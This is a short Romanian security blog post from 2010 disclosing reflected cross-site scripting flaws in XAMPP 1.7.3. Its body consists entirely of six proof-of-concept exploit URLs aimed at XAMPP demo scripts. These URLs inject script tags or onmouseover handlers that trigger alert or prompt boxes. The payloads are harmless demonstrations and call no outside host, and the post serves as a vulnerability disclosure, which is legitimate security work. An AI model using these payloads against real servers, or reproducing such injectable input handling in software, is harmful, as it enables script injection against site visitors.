Vulnerabilitate XAMPP 1.7.3 – XSS - Securitatea Informatica

Vulnerabilitate XAMPP 1.7.3 – XSS

Data:
11/06/2010

Exploit:
http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script>
http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)>
http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)>
http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script>
http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)>
http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script>

Twitter Digg Delicious Stumbleupon Technorati Facebook


Nici un comentariu inca... Fii primul care lasa un comentariu!

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro